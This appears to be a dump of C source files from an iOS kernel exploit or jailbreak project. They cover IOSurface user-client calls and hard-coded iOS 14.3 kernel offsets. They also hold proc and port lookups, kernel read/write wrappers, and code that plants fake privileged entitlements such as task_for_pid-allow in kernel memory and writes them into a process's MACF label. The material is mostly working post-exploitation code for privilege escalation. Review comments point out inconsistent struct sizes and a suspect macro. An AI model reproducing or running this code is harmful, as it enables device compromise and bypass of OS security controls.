 * copy in manticore/lib/Bazad/IOSurface.h.
 * NOTE(review): the enumerator names duplicate that header's, so the two must
 * never be included into the same translation unit.
 */
enum {
kOSSerializeDictionary = 0x01000000,
kOSSerializeArray = 0x02000000,
kOSSerializeSet = 0x03000000,
kOSSerializeNumber = 0x04000000,
kOSSerializeSymbol = 0x08000000,
kOSSerializeString = 0x09000000,
kOSSerializeData = 0x0a000000,
kOSSerializeBoolean = 0x0b000000,
kOSSerializeObject = 0x0c000000,
kOSSerializeTypeMask = 0x7f000000,
kOSSerializeDataMask = 0x00ffffff,
kOSSerializeEndCollection = 0x80000000,
kOSSerializeBinarySignature = 0x000000d3,
};
33 |
// Largest property index that still encodes to 0x00ffffff; any larger value
// makes IOSurface_property_key() wrap and collide with a smaller index, so
// spray code must stay at or below it.
#define MAX_IOSURFACE_PROPERTY_INDEX (0x00fd02fe)
37 |
38 | // ---- IOSurface types ---------------------------------------------------------------------------
39 |
/*
 * Input structure for the create_surface_client_fast_path call (selector 6);
 * iosurface_create_fast() below sets only alloc_size and leaves the rest zero.
 */
struct _IOSurfaceFastCreateArgs {
uint64_t address;
uint32_t width;
uint32_t height;
uint32_t pixel_format;
uint32_t bytes_per_element;
uint32_t bytes_per_row;
uint32_t alloc_size;
};
49 |
/*
 * Output structure of the create_surface_client_fast_path call: three pointers,
 * the surface ID, and padding to 0xf60 bytes in total. The padding arithmetic
 * (0xf60 - 0x18 - 0x4) assumes 8-byte pointers, i.e. an arm64 build.
 * NOTE(review): manticore/lib/Bazad/IOSurface.h pads the same struct to 0xdd0;
 * the two copies cannot both match the kernel's expected output size.
 */
struct IOSurfaceLockResult {
//uint8_t _pad1[0x18];
uint8_t *mem;
uint8_t *shared_B0;
uint8_t *shared_40;
uint32_t surface_id;
uint8_t _pad2[0xf60-0x18-0x4];
};
58 |
/*
 * Input to set_value (selector 9): surface ID, one further word, then either a
 * serialized property blob or a raw string overlaid through zero-length
 * arrays (GNU extension). The caller supplies the true byte count separately.
 */
struct IOSurfaceValueArgs {
uint32_t surface_id;
uint32_t field_4;
union {
uint32_t xml[0];
char string[0];
};
};
67 |
/* Output of set_value: a single 32-bit word. */
struct IOSurfaceValueResultArgs {
uint32_t field_0;
};
71 |
72 | // ---- Global variables --------------------------------------------------------------------------
73 |
// Property-index counter; marked __unused and not referenced anywhere in this file.
static uint32_t __unused IOSurface_property_index = 0;

// Is the IOSurface subsystem initialized? Set by IOSurface_init(), cleared by IOSurface_deinit().
static bool IOSurface_initialized;

// The IOSurfaceRoot service (released by IOSurface_deinit()).
mach_port_t IOSurfaceRoot;

// An IOSurfaceRootUserClient instance (closed by IOSurface_deinit()).
mach_port_t IOSurfaceRootUserClient;

// The ID of the IOSurface we're using (created on IOSurfaceRootUserClient).
uint32_t IOSurface_id;

// A second ("worker") user client and the ID of the surface created on it. Both are
// exported (k_utils.c declares them extern) and neither is closed by IOSurface_deinit().
mach_port_t IOSurface_worker_uc;
uint32_t IOSurface_worker_id;
90 |
91 | // ---- External methods --------------------------------------------------------------------------
92 |
/*
 * IOSurface_set_value
 *
 * Description:
 * 	Call external method 9 (set_value) on the worker user client with an already
 * 	serialized value.
 *
 * Parameters:
 * 	args		IOSurfaceValueArgs header followed by the serialized payload.
 * 	args_size	Total byte length of the structure input (header plus payload).
 *
 * Returns:
 * 	true on KERN_SUCCESS; false otherwise, after logging the error code.
 */
static bool
IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size) {
	struct IOSurfaceValueResultArgs reply;
	size_t reply_size = sizeof(reply);
	// No scalar inputs or outputs are used by this selector.
	kern_return_t ret = IOConnectCallMethod(IOSurface_worker_uc,
	                                        9, // set_value
	                                        NULL, 0,
	                                        args, args_size,
	                                        NULL, NULL,
	                                        &reply, &reply_size);
	bool ok = (ret == KERN_SUCCESS);
	if (!ok) {
		util_error("Failed to %s value in %s: 0x%x", "set", "IOSurface", ret);
	}
	return ok;
}
110 |
111 | // ---- Initialization ----------------------------------------------------------------------------
112 |
/*
 * iosurface_create_fast
 *
 * Description:
 * 	Create a surface through the fast-path create selector (6) on the primary user
 * 	client, with an allocation of one page (g_exp.pagesize).
 *
 * Returns:
 * 	The new surface ID, or 0 if the call failed (the error code is logged).
 */
uint32_t iosurface_create_fast()
{
	struct _IOSurfaceFastCreateArgs args = {
		.alloc_size = (uint32_t) g_exp.pagesize,
	};
	struct IOSurfaceLockResult reply;
	size_t reply_size = sizeof(reply);
	kern_return_t ret = IOConnectCallMethod(IOSurfaceRootUserClient,
	                                        6, // create_surface_client_fast_path
	                                        NULL, 0,
	                                        &args, sizeof(args),
	                                        NULL, NULL,
	                                        &reply, &reply_size);
	if (ret == KERN_SUCCESS) {
		return reply.surface_id;
	}
	util_error("could not create %s: 0x%x", "IOSurfaceClient", ret);
	return 0;
}
132 |
/*
 * iosurface_s_get_ycbcrmatrix
 *
 * Description:
 * 	Call selector 8 (s_get_ycbcrmatrix) on the primary user client for client
 * 	object 1 and return its single scalar output.
 *
 * Returns:
 * 	The low 32 bits of the output scalar, or 0 if the call failed (logged).
 */
uint32_t iosurface_s_get_ycbcrmatrix(void)
{
	uint64_t in = 1;   // fixed, first valid client obj
	uint64_t out = 0;
	uint32_t out_count = 1;
	kern_return_t ret = IOConnectCallMethod(IOSurfaceRootUserClient,
	                                        8, // s_get_ycbcrmatrix
	                                        &in, 1,
	                                        NULL, 0,
	                                        &out, &out_count,
	                                        NULL, NULL);
	if (ret != KERN_SUCCESS) {
		util_error("s_get_ycbcrmatrix error: 0x%x", ret);
		return 0;
	}
	return (uint32_t)out;
}
153 |
/*
 * iosurface_s_set_indexed_timestamp
 *
 * Description:
 * 	Call selector 33 (s_set_indexed_timestamp) on the primary user client, storing
 * 	the 64-bit value v at timestamp index 0 of client object 1.
 *
 * Parameters:
 * 	v	The value to store. Failures are logged and otherwise ignored.
 */
void iosurface_s_set_indexed_timestamp(uint64_t v)
{
	// Scalar inputs: client object (fixed, first valid), index, value.
	uint64_t in[3] = { 1, 0, v };
	kern_return_t ret = IOConnectCallMethod(IOSurfaceRootUserClient,
	                                        33, // s_set_indexed_timestamp
	                                        in, (uint32_t)(sizeof(in) / sizeof(in[0])),
	                                        NULL, 0,
	                                        NULL, NULL,
	                                        NULL, NULL);
	if (ret == KERN_SUCCESS) {
		return;
	}
	util_error("s_set_indexed_timestamp error: 0x%x", ret);
}
174 |
/*
 * build_essential_entitlements
 *
 * Description:
 * 	Serialize a dictionary mapping four entitlement names to true, wrapped as the
 * 	[value, key] array expected by set_value, and store it on the worker surface
 * 	under the property name "essential-entitlements". k_utils.c later reads that
 * 	property back out of the kernel dictionary (prepare_fake_entitlements()).
 *
 * 	NOTE(review): the dlopen() handle is never dlclose()d, malloc() is not NULL-checked,
 * 	and the IOSurface_set_value() result is discarded; IOSurface_init() reports success
 * 	even if this property was never stored.
 */
static void build_essential_entitlements(void){
	CFStringRef names[] = {
		CFSTR("task_for_pid-allow"),
		CFSTR("com.apple.system-task-ports"),
		CFSTR("com.apple.private.security.container-manager"),
		CFSTR("com.apple.private.security.storage.AppBundles"),
	};
	CFTypeRef flags[] = {
		kCFBooleanTrue,
		kCFBooleanTrue,
		kCFBooleanTrue,
		kCFBooleanTrue,
	};
	CFDictionaryRef entitlements = CFDictionaryCreate(NULL, (void *)names, (void *)flags, arrayn(names),
			&kCFCopyStringDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);

	// Payload order is [value, key]: the dictionary first, then the property name.
	CFMutableArrayRef payload = CFArrayCreateMutable(kCFAllocatorDefault, 0, &kCFTypeArrayCallBacks);
	CFArrayAppendValue(payload, entitlements);
	CFArrayAppendValue(payload, CFSTR("essential-entitlements"));

	// IOCFSerialize is resolved at run time instead of being linked directly.
	void *iokit = dlopen("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_LOCAL);
	CFDataRef (*serialize)(CFTypeRef, uint32_t) = dlsym(iokit, "IOCFSerialize");
	assert(serialize != NULL);
	CFDataRef serialized = serialize(payload, 1);

	size_t payload_len = CFDataGetLength(serialized);
	size_t request_len = sizeof(struct IOSurfaceValueArgs) + payload_len;
	struct IOSurfaceValueArgs *request = malloc(request_len);
	request->surface_id = IOSurface_worker_id;
	request->field_4 = 0;
	memcpy(request->xml, CFDataGetBytePtr(serialized), payload_len);
	IOSurface_set_value(request, request_len);
	free(request);

	CFRelease(entitlements);
	CFRelease(payload);
	CFRelease(serialized);
}
217 |
218 |
/*
 * IOSurface_init
 *
 * Description:
 * 	Look up IOSurfaceRoot, open two user clients on it (primary and worker), create one
 * 	page-sized surface on each, then attach the "essential-entitlements" property to the
 * 	worker surface. Idempotent: a second call returns true without redoing anything.
 *
 * Returns:
 * 	true once everything succeeded; false on the first failure (logged).
 *
 * 	NOTE(review): on a failure after the first IOServiceOpen() the already-opened
 * 	ports are not closed, and IOSurface_initialized stays false, so IOSurface_deinit()
 * 	must not be called afterwards (its assert would fire).
 */
bool IOSurface_init(void) {
	if (IOSurface_initialized) {
		return true;
	}
	IOSurfaceRoot = IOServiceGetMatchingService(kIOMasterPortDefault,
	                                            IOServiceMatching("IOSurfaceRoot"));
	if (IOSurfaceRoot == MACH_PORT_NULL) {
		util_error("could not find %s", "IOSurfaceRoot");
		return false;
	}
	kern_return_t ret = IOServiceOpen(IOSurfaceRoot, mach_task_self(), 0, &IOSurfaceRootUserClient);
	if (ret != KERN_SUCCESS) {
		util_error("could not open %s", "IOSurfaceRootUserClient");
		return false;
	}
	ret = IOServiceOpen(IOSurfaceRoot, mach_task_self(), 0, &IOSurface_worker_uc);
	if (ret != KERN_SUCCESS) {
		util_error("could not open %s", "IOSurfaceRoot worker UserClient");
		return false;
	}

	// One fast-path surface per user client, in the same order as the clients were opened.
	struct _IOSurfaceFastCreateArgs args = { .alloc_size = (uint32_t) g_exp.pagesize };
	struct IOSurfaceLockResult reply;
	size_t reply_size = sizeof(reply);
	mach_port_t clients[2] = { IOSurfaceRootUserClient, IOSurface_worker_uc };
	uint32_t *ids[2] = { &IOSurface_id, &IOSurface_worker_id };
	const char *labels[2] = { "IOSurfaceClient", "IOSurfaceClient worker" };
	for (int n = 0; n < 2; n++) {
		ret = IOConnectCallMethod(clients[n],
		                          6, // create_surface_client_fast_path
		                          NULL, 0,
		                          &args, sizeof(args),
		                          NULL, NULL,
		                          &reply, &reply_size);
		if (ret != KERN_SUCCESS) {
			util_error("could not create %s: 0x%x", labels[n], ret);
			return false;
		}
		*ids[n] = reply.surface_id;
	}

	build_essential_entitlements();
	IOSurface_initialized = true;
	return true;
}
275 |
/*
 * IOSurface_deinit
 *
 * Description:
 * 	Tear down the primary user client and the IOSurfaceRoot service port opened by
 * 	IOSurface_init(). Asserts that IOSurface_init() completed successfully.
 *
 * 	NOTE(review): IOSurface_worker_uc and IOSurface_worker_id are left untouched, so the
 * 	worker surface (carrying the "essential-entitlements" property that k_utils.c
 * 	reads) outlives this call. Whether that is intentional is not visible here --
 * 	confirm with the callers before adding a close.
 */
void IOSurface_deinit(void) {
	assert(IOSurface_initialized);
	IOSurface_initialized = false;
	IOServiceClose(IOSurfaceRootUserClient);
	IOObjectRelease(IOSurfaceRoot);
	IOSurface_id = 0;
}
283 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/k_offsets.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #define Q_INTERNAL
6 | #include
7 | #include "include/util/arm.h"
8 |
// Selects the PAC (arm64e) variant of the task offsets below.
// NOTE(review): is_pac is not declared in this file. Inside `#if`, an identifier that is
// not a macro evaluates to 0, so unless is_pac is a macro `#if _arm64e` is always true;
// and if is_pac does mean "PAC present", `(is_pac == 0)` is inverted relative to the
// macro's name. kernel_offsets_init() reports g_exp.has_PAC instead of this value.
// Wrong task offsets translate directly into wrong kernel reads/writes -- confirm.
#ifndef _arm64e
#define _arm64e (is_pac == 0)
#endif
12 |
// Install the hard-coded structure offsets consumed by k_utils.c (OFFSET()/SIZE()).
// Nothing here is derived from the running kernel; kernel_offsets_init() applies this
// single table unconditionally.
static void offsets_base_iOS_14_x() {
    // Static kernelcache base; slide handling, if any, is not in this file.
    kc_kernel_base = 0xFFFFFFF007004000;

    SIZE(ipc_entry) = 0x18;
    OFFSET(ipc_entry, ie_object) = 0x0;

    OFFSET(ipc_port, ip_bits) = 0x0;
    OFFSET(ipc_port, ip_references) = 0x4;
    OFFSET(ipc_port, ip_kobject) = 0x68;

    OFFSET(ipc_space, is_table_size) = 0x14;
    OFFSET(ipc_space, is_table) = 0x20;

    OFFSET(task, map) = 0x28;
    OFFSET(task, itk_space) = 0x330;

    // The two task fields below differ between the PAC and non-PAC layouts; the
    // choice is made by the _arm64e macro at the top of this file.
#if _arm64e
    OFFSET(task, bsd_info) = 0x3a0;
    OFFSET(task, t_flags) = 0x3f4;
#else
    OFFSET(task, bsd_info) = 0x390;
    OFFSET(task, t_flags) = 0x3d8;
#endif

    OFFSET(proc, le_next) = 0x00;
    OFFSET(proc, le_prev) = 0x08;
    OFFSET(proc, task) = 0x10;
    OFFSET(proc, p_pid) = 0x68;
    OFFSET(proc, p_ucred) = 0xf0;
    OFFSET(proc, p_fd) = 0xf8;
    OFFSET(proc, csflags) = 0x280;
    // NOTE(review): gid/rgid/uid/ruid at 0x30..0x3c look like credential-style fields
    // rather than struct proc members; none of them is used by the visible sources.
    OFFSET(proc, gid) = 0x34;
    OFFSET(proc, rgid) = 0x3c;
    OFFSET(proc, uid) = 0x30;
    OFFSET(proc, ruid) = 0x38;
    OFFSET(proc, pid) = 0x68;   // alias of p_pid

    OFFSET(filedesc, fd_ofiles) = 0x00;
    OFFSET(fileproc, fp_glob) = 0x10;
    OFFSET(fileglob, fg_data) = 0x38;
    OFFSET(pipe, buffer) = 0x10;

    // cr_posix (0x18) + SIZE(posix_cred) (0x60) == cr_label (0x78); proc_fetch_MACF()
    // and debug_dump_proc_cred() rely on that arithmetic instead of OFFSET(ucred, cr_label).
    OFFSET(ucred, cr_posix) = 0x18;
    OFFSET(ucred, cr_uid) = 0x18;   // first field of the embedded posix_cred
    OFFSET(ucred, cr_svuid) = 0x20;
    OFFSET(ucred, cr_ngroups) = 0x24;
    OFFSET(ucred, cr_groups) = 0x28;
    OFFSET(ucred, cr_svgid) = 0x6c;
    OFFSET(ucred, cr_rgid) = 0x68;
    OFFSET(ucred, cr_label) = 0x78;

    SIZE(posix_cred) = 0x60;

    // OSDictionary header fields read by kernel_fetch_dict().
    OFFSET(OSDictionary, count) = 0x14;
    OFFSET(OSDictionary, capacity) = 0x18;
    OFFSET(OSDictionary, dictionary) = 0x20;

    OFFSET(OSString, string) = 0x10;

    // Chain walked by prepare_fake_entitlements(): user client -> clients array -> surface -> values.
    OFFSET(IOSurfaceRootUserClient, surfaceClients) = 0x118;
    OFFSET(IOSurfaceClient, surface) = 0x40;
    OFFSET(IOSurface, values) = 0xe8;

    OFFSET(vnode, vmount) = 0xd8;
}
78 |
// Log the PAC flag and install the only offset table this build carries.
// NOTE(review): g_exp.osproductversion is never consulted; the "iOS 14.3" table is
// applied whatever the device is actually running.
void kernel_offsets_init(void) {
    fprintf(stdout, "has_pac: %x\n", g_exp.has_PAC);
    util_info("using default iOS 14.3 Offsets");
    offsets_base_iOS_14_x();
}
85 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/k_utils.c:
--------------------------------------------------------------------------------
1 | //
2 | // k_utils.c
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 |
// Null kernel pointer; the proc-list walkers stop when they read this from le_next/le_prev.
#define KPTR_NULL ((kptr_t) 0)
// Defined to nothing: any _assert() in this translation unit compiles to no check at
// all (no use is visible in this file).
#define _assert(x)
22 |
// Walk the proc list forward from `proc` along le_next, calling `match` with each
// proc address and its p_pid; stops at the first true result, at a null le_next,
// or when KERN_POINTER_VALID() rejects the address.
static void kproc_foreach(kptr_t proc, bool (^match)(kptr_t, pid_t)){
    for (kptr_t cur = proc; KERN_POINTER_VALID(cur); ) {
        pid_t cur_pid = kapi_read32(cur + OFFSET(proc, p_pid));
        if (g_exp.debug) {
            util_msleep(100);   // slows the walk in debug builds, presumably so the log stays readable
        }
        if (match(cur, cur_pid)) {
            return;
        }
        kptr_t next = kapi_read_kptr(cur + OFFSET(proc, le_next));
        if (next == KPTR_NULL) {
            return;
        }
        cur = next;
    }
}
41 |
// Forward-walk from `proc` and return the address of the proc whose pid is 0;
// returns KPTR_NULL (after logging) when none is found.
kptr_t kproc_find_pid0(kptr_t proc){
    __block kptr_t result = KPTR_NULL;
    kproc_foreach(proc, ^ bool (kptr_t cur, pid_t cur_pid) {
        if (cur_pid != 0) {
            return false;
        }
        result = cur;
        return true;
    });
    if (result == KPTR_NULL) {
        util_error("can not find proc0");
    }
    return result;
}
57 |
// Walk the proc list backwards from `proc` along le_prev. Unlike kproc_foreach()
// there is no debug delay here.
static void kproc_foreach_reverse(kptr_t proc, bool (^match)(kptr_t, pid_t)){
    kptr_t cur = proc;
    while (KERN_POINTER_VALID(cur)) {
        pid_t cur_pid = kapi_read32(cur + OFFSET(proc, p_pid));
        if (match(cur, cur_pid)) {
            break;
        }
        kptr_t prev_link = kapi_read_kptr(cur + OFFSET(proc, le_prev));
        if (prev_link == KPTR_NULL) {
            break;
        }
        // le_prev is treated as the address of the previous entry's le_next field,
        // so rebase it to the start of that proc.
        cur = prev_link - OFFSET(proc, le_next);
    }
}
73 |
74 |
// Return the proc address for `pid`, searching backwards from g_exp.kernel_proc;
// KPTR_NULL (after logging) when not found.
kptr_t kproc_find_by_pid(pid_t pid) {
    __block kptr_t result = KPTR_NULL;
    kproc_foreach_reverse(g_exp.kernel_proc, ^ bool (kptr_t cur, pid_t cur_pid) {
        if (cur_pid != pid) {
            return false;
        }
        result = cur;
        return true;
    });
    if (result == KPTR_NULL) {
        util_error("can not find kproc for pid %u", pid);
    }
    return result;
}
90 |
// Translate a port name of our own task into the kernel address of its ipc_entry.
// Returns 0 (with a warning) when the name's index is outside is_table.
kptr_t ipc_entry_lookup(mach_port_t port_name) {
    kptr_t space = g_exp.self_ipc_space;
    uint32_t index = MACH_PORT_INDEX(port_name);
    uint32_t table_entries = kapi_read32(space + OFFSET(ipc_space, is_table_size));
    if (index >= table_entries) {
        util_warning("invalid port name %#x", port_name);
        return 0;
    }
    kptr_t table = kapi_read_kptr(space + OFFSET(ipc_space, is_table));
    return table + index * SIZE(ipc_entry);
}
103 |
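// Return the ipc_port address behind a port name of our task, or 0 when the name is
// not valid. Previously an invalid name (ipc_entry_lookup() returning 0) led to a
// kernel read at address OFFSET(ipc_entry, ie_object); debug_dump_ipc_port() already
// guards this case, so do the same here.
kptr_t port_name_to_ipc_port(mach_port_t port_name) {
    kptr_t entry = ipc_entry_lookup(port_name);
    if (entry == 0) {
        return 0;   // ipc_entry_lookup() has already warned
    }
    return kapi_read_kptr(entry + OFFSET(ipc_entry, ie_object));
}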
109 |
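// Return the ip_kobject of the port behind `port_name`, or 0 when the port could not
// be resolved. Without the check a failed lookup turned into a read at
// OFFSET(ipc_port, ip_kobject) rather than a clean 0 result.
kptr_t port_name_to_kobject(mach_port_t port_name) {
    kptr_t ipc_port = port_name_to_ipc_port(port_name);
    if (ipc_port == 0) {
        return 0;
    }
    return kapi_read_kptr(ipc_port + OFFSET(ipc_port, ip_kobject));
}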
115 |
116 |
// Print ip_bits, ip_references and ip_kobject of the port named `port_name`; when
// `kobj` is non-NULL the kobject pointer is also stored there. Nothing is written on
// an invalid name (an error is logged and *kobj is left untouched).
void debug_dump_ipc_port(mach_port_t port_name, kptr_t *kobj) {
    kptr_t entry = ipc_entry_lookup(port_name);
    if (!entry) {
        util_error("can not find port entry %#x", port_name);
        return;
    }
    kptr_t port = kapi_read_kptr(entry + OFFSET(ipc_entry, ie_object));
    uint32_t bits = kapi_read32(port + OFFSET(ipc_port, ip_bits));
    uint32_t refs = kapi_read32(port + OFFSET(ipc_port, ip_references));
    kptr_t kobject = kapi_read_kptr(port + OFFSET(ipc_port, ip_kobject));
    printf("ipc_port: ip_bits %#x, ip_refs %#x\n", bits, refs);
    printf("ip_kobject: %#llx\n", kobject);
    if (kobj != NULL) {
        *kobj = kobject;
    }
}
133 |
// Log the cr_label pointer of `proc`'s ucred and, when present, its l_flags and the
// three pointer slots at +0x08/+0x10/+0x18. The embedded posix_cred is read but not
// printed (the read is kept as-is). Ends with a short sleep.
void debug_dump_proc_cred(kptr_t proc) {
    kptr_t ucred = kapi_read_kptr(proc + OFFSET(proc, p_ucred));
    kptr_t posix_cred = ucred + OFFSET(ucred, cr_posix);

    char cred_bytes[SIZE(posix_cred)];
    kapi_read(posix_cred, cred_bytes, SIZE(posix_cred));

    // cr_label immediately follows the embedded posix_cred.
    kptr_t label = kapi_read_kptr(posix_cred + SIZE(posix_cred));
    util_info("cr_label %#llx", label);
    if (label != 0) {
        int flags = kapi_read32(label + 0x00);
        util_info("l_flags %#x", flags);
        kptr_t slots[3];
        for (int n = 0; n < arrayn(slots); n++) {
            slots[n] = kapi_read_kptr(label + 0x08 + 0x08 * n);
        }
        for (int n = 0; n < arrayn(slots); n++) {
            util_info("label[%d] %#llx", n, slots[n]);
        }
    }
    util_printf("---- end ----\n");
    util_msleep(200);
}
158 |
// Copy a kernel OSDictionary into user space: its count/capacity/entry-array pointer,
// the entry array itself, and the text of each key (read as an OSSymbol). The result
// is one malloc()ed block laid out as [struct kOSDict][cap entries][cap name pointers]
// [cap x 256-byte names]; the caller frees it, and proc_write_MACF() can write the entry
// array back.
// NOTE(review): malloc() is not NULL-checked, `cap`/`len` are trusted as read from the
// kernel, and the `|= 0xffffff8000000000` below assumes the pointer only needs its
// upper bits restored.
struct kOSDict *kernel_fetch_dict(kptr_t dict_addr){
    // First 0x28 bytes of the OSDictionary object: enough to cover count/capacity/dictionary.
    char obj[0x28];
    kapi_read(dict_addr, obj, sizeof(obj));
    uint32_t cap = *(uint32_t *)(obj + OFFSET(OSDictionary, capacity));
    struct kOSDict *dict;
    // One allocation for header + cap entries + cap name pointers + cap 256-byte names.
    size_t alloc_size = sizeof(*dict) + cap * (sizeof(struct kDictEntry) + sizeof(char *) + 256);
    dict = (struct kOSDict *)malloc(alloc_size);
    dict->self_addr = dict_addr;
    dict->cap = cap;
    dict->count = *(uint32_t *)(obj + OFFSET(OSDictionary, count));
    dict->items_addr = kapi_read_kptr(dict_addr + OFFSET(OSDictionary, dictionary));
    // Carve the trailing data area: entries, then name pointers, then the name buffers.
    char *ptr = dict->data;
    dict->items = (struct kDictEntry *)ptr;
    ptr += sizeof(struct kDictEntry) * dict->cap;
    dict->names = (char **)ptr;
    ptr += sizeof(char *) * dict->cap;
    for (int i = 0; i < dict->cap; i++) {
        dict->names[i] = ptr;
        ptr += 256;
    }
    util_info("dict %#llx, items %#llx, count %u, capacity %u",
            dict->self_addr, dict->items_addr, dict->count, dict->cap);
    // Fetch the whole key/value entry array in one read.
    alloc_size = sizeof(struct kDictEntry) * dict->cap;
    kapi_read(dict->items_addr, dict->items, alloc_size);
    for (int i = 0; i < dict->count; i++) {
        char obj[0x18];
        kapi_read(dict->items[i].key, obj, sizeof(obj));
        // OSSymbol
        // Length comes from the upper bits of the word at +0xc; clamp to 255 so the
        // terminator written below stays inside the 256-byte name buffer.
        uint32_t len = *(uint32_t *)(obj + 0xc) >> 14;
        if (len >= 256) {
            len = 255;
        }
        // PACed in iOS 14.3
        kptr_t string = *(kptr_t *)(obj + OFFSET(OSString, string));
        string |= 0xffffff8000000000;
        kapi_read(string, dict->names[i], len);
        dict->names[i][len] = 0;
        util_info(" -> %s", dict->names[i]);
    }
    return dict;
}
200 |
// Fetch the OSDictionary held in slot +0x08 of `proc`'s cr_label into user space.
// Returns NULL (after logging) when either the label or the slot pointer is null;
// the caller owns the returned block (free()).
struct kOSDict *proc_fetch_MACF(kptr_t proc){
    kptr_t ucred = kapi_read_kptr(proc + OFFSET(proc, p_ucred));
    // cr_label sits directly after the embedded posix_cred.
    kptr_t label = kapi_read_kptr(ucred + OFFSET(ucred, cr_posix) + SIZE(posix_cred));
    if (!label) {
        util_error("cr_label is NULL?");
        return NULL;
    }
    kptr_t slot = kapi_read_kptr(label + 0x08);
    if (!slot) {
        util_error("MACF slot is NULL?");
        return NULL;
    }
    return kernel_fetch_dict(slot);
}
220 |
// Write a user-space copy produced by kernel_fetch_dict() back: the count word of the
// dictionary header and the full entry array (cap entries). `proc` is not used; the
// target addresses come from the kOSDict itself.
void proc_write_MACF(kptr_t proc, struct kOSDict *macf){
    kapi_write32(macf->self_addr + OFFSET(OSDictionary, count), macf->count);
    kapi_write(macf->items_addr, macf->items, sizeof(struct kDictEntry) * macf->cap);
}
226 |
// Worker user client and its surface ID, owned by iosurface.c; the "essential-entitlements"
// property that prepare_fake_entitlements() looks up was stored on that surface.
extern mach_port_t IOSurface_worker_uc;
extern uint32_t IOSurface_worker_id;

// User-space copy of the prepared entitlement dictionary. NULL until
// prepare_fake_entitlements() succeeds; borrow_fake_entitlement() dereferences it
// without checking.
static struct kOSDict *fake_ents;
231 |
// Locate the worker surface's property dictionary in the kernel, find its
// "essential-entitlements" entry and keep a user-space copy of that dictionary in
// fake_ents. Halts via fail_if() when the entry is missing.
void prepare_fake_entitlements(void){
    // user client kobject -> surfaceClients[] -> IOSurfaceClient -> IOSurface -> values
    kptr_t root_uc = port_name_to_kobject(IOSurface_worker_uc);
    kptr_t clients = kapi_read_kptr(root_uc + OFFSET(IOSurfaceRootUserClient, surfaceClients));
    kptr_t client = kapi_read_kptr(clients + IOSurface_worker_id * sizeof(kptr_t));
    kptr_t surface = kapi_read_kptr(client + OFFSET(IOSurfaceClient, surface));
    kptr_t values = kapi_read_kptr(surface + OFFSET(IOSurface, values));

    struct kOSDict *props = kernel_fetch_dict(values);
    // Expected entries: [0] CreationProperties, [1] essential-entitlements
    int idx = 0;
    while (idx < props->count && strcmp(props->names[idx], "essential-entitlements") != 0) {
        idx++;
    }
    if (idx < props->count) {
        fake_ents = kernel_fetch_dict(props->items[idx].value);
    }
    fail_if(fake_ents == NULL, "no prepared entitlements?");
    free(props);
}
251 |
// Return a pointer into fake_ents for the entry named `name`, or NULL if absent.
// There is no early exit, so with duplicate names the last match wins.
// Requires prepare_fake_entitlements() to have run (fake_ents is dereferenced unchecked).
struct kDictEntry *borrow_fake_entitlement(const char *name){
    struct kDictEntry *found = NULL;
    for (int i = 0; i < fake_ents->count; i++) {
        if (strcmp(fake_ents->names[i], name) == 0) {
            found = fake_ents->items + i;
        }
    }
    return found;
}
261 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/kapi_mem.c:
--------------------------------------------------------------------------------
1 | //
2 | // kapi_memory.c
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/22.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 |
// Kernel task port. While it is MACH_PORT_NULL every kapi_* accessor below routes
// through the stage0_* blocks; once it is set the accessors do nothing at all
// (reads return 0, writes return false) -- no task-port backed path exists in this file.
mach_port_t kernel_task_port;

// Stage-0 read primitives; assigned elsewhere (not in this file).
void (^stage0_read)(kptr_t addr, void *data, size_t len);
uint32_t (^stage0_read32)(kptr_t addr);
uint64_t (^stage0_read64)(kptr_t addr);
kptr_t (^stage0_read_kptr)(kptr_t addr);

// Stage-0 write primitives; assigned elsewhere (not in this file).
void (^stage0_write)(kptr_t addr, void *data, size_t len);
void (^stage0_write64)(kptr_t addr, uint64_t v);
21 |
// Read `len` bytes at kernel address `addr` into `data` through stage0_read.
// No-op once kernel_task_port is set (no alternative path is implemented).
void kapi_read(kptr_t addr, void *data, size_t len)
{
    if (kernel_task_port) {
        return;
    }
    stage0_read(addr, data, len);
}
28 |
// Read a 32-bit value at `addr` via stage0_read32; returns 0 once kernel_task_port is set.
uint32_t kapi_read32(kptr_t addr)
{
    return kernel_task_port ? 0 : stage0_read32(addr);
}
36 |
// Read a 64-bit value at `addr` via stage0_read64; returns 0 once kernel_task_port is set.
uint64_t kapi_read64(kptr_t addr)
{
    return kernel_task_port ? 0 : stage0_read64(addr);
}
44 |
// Read a kernel pointer at `addr` via stage0_read_kptr; returns 0 once kernel_task_port is set.
kptr_t kapi_read_kptr(kptr_t addr)
{
    return kernel_task_port ? 0 : stage0_read_kptr(addr);
}
52 |
// Write `len` bytes from `data` to kernel address `addr` through stage0_write.
// No-op once kernel_task_port is set.
void kapi_write(kptr_t addr, void *data, size_t len)
{
    if (kernel_task_port) {
        return;
    }
    stage0_write(addr, data, len);
}
59 |
// Write a 32-bit `value` to `addr` using the generic stage0_write block.
// Returns true when the stage0 path was used, false once kernel_task_port is set.
bool kapi_write32(kptr_t addr, uint32_t value)
{
    if (kernel_task_port) {
        return false;
    }
    stage0_write(addr, &value, sizeof(value));
    return true;
}
68 |
// Write a 64-bit `value` to `addr` via stage0_write64.
// Returns true when the stage0 path was used, false once kernel_task_port is set.
bool kapi_write64(kptr_t addr, uint64_t value)
{
    if (kernel_task_port) {
        return false;
    }
    stage0_write64(addr, value);
    return true;
}
77 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/sys_darwin.c:
--------------------------------------------------------------------------------
1 | //
2 | // sys_darwin.c
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 |
15 | struct exploit_common_s g_exp;
16 |
